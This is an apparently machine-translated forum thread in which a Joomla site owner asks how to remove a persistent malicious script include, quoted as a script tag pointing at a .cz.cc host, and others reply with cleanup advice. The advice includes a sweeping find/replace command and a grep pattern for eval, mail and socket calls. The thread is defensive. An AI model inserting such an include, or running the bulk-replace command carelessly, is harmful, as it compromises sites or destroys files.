这是我的网站。http://ziggymonster.com/
起初它有4个受torjan感染的js文件和一些恶意代码。我已经清理了那些文件。但是现在我无法找到这个javascript include.
<script src="http://boneraffyaho.cz.cc/jquery.minph.js"></script>
你可以通过查看页面的来源。
包含在每个的末尾。它保持页面加载,扫描器将其检测为恶意代码。
我一直在做的事情。
1)模板改变2)尝试禁用所有组件。3)尝试禁用所有组件。4)试图禁用所有插件。5)下载完整站点,在完整站点中搜索此代码。但是找不到。
但它仍然在那里。你能给我一些建议吗?
恶意代码即使在禁用javascript时也存在于页面中-这告诉我们它不是由文档编写的。在其他js文件中写入
当我们使用tmpl=component&no_html=1设置来访问站点时,该设置抑制模板输出,只发送组件的输出,代码仍然存在:http://ziggymonster.com/?tmpl=component& no_html = 1
这将指向相当强烈的代码已被附加在主Joomla index.php文件的末尾在您的网站的根。另外,在模板自己的文件夹或/templates/system/文件夹中的component.php文件也可以是可行的候选文件。
现场清理是有风险的,但可以通过正确的知识,一些经验和正确的工具来完成。我建议找一个有经验的Joomla安全专家来做,或者面对重新构建网站的文件:在一个完全干净的文件夹中安装一个新的Joomla(最好是本地主机服务器),安装所有的扩展,然后删除您的活动网站,并将文件上传到您的web空间,将文件绑定到原始数据库。
当然,从几天前恢复到备份将是最好的选择-你有备份,是吗?
您应该检查日志文件,以了解攻击是如何实施的。您还应该更改所有密码,升级Joomla和所有附加组件-并考虑更改web主机,如果它看起来像服务器上的另一个帐户提供的访问权限,允许黑客进入。
好运。
清除各种恶意代码的最快方法是通过ssh连接,打开您的站点目录并运行如下查询:
find . '*.*' -exec replace 'HERE_IS_BAD_CODE' '' -- {} ';
还可以通过修改来过滤要搜索的文件类型。 *.php或*.html
免责声明:您应该非常非常小心ssh
如果您熟悉ssh,那么您可以使用以下命令:
find . -type f -iname '*.php' -exec grep -l "mail('|eval('|sockopen'|socket_client" {} ';
搜索包含危险代码的php文件(从当前目录递归地)。黑客对Php的本地邮件函数很感兴趣,但eval和套接字API函数也很感兴趣。我每天在我的服务器上运行一次这个命令,过去它发现了恶意脚本。
要真正确定,您需要重新构建您的站点。备份您的数据库和文件,然后从根目录中删除所有文件,并从新的副本重新上传(Joomla从http://www.joomla.org/,扩展从他们的网站,等等)。然后你可以重新上传你的媒体文件夹和任何自定义代码(模板等)。
如果你不是很懂技术,你会想安装Joomla和扩展,然后删除数据库和configuration.php,并重新上传你的旧configuration.php和数据库。否则你必须自己解压缩扩展。
至少,我建议上传一个新的Joomla core副本(你需要在上传之后直接删除'installation'目录)。这是相当安全的,因为发行版不会覆盖你的"configuration.php"。当然,如果你已经黑了Joomla的核心(坏主意),那么你需要重新应用你的自定义hack。
检查你的安全措施也是一个好主意——你的密码需要更改吗?是否所有的文件都需要web服务器可写?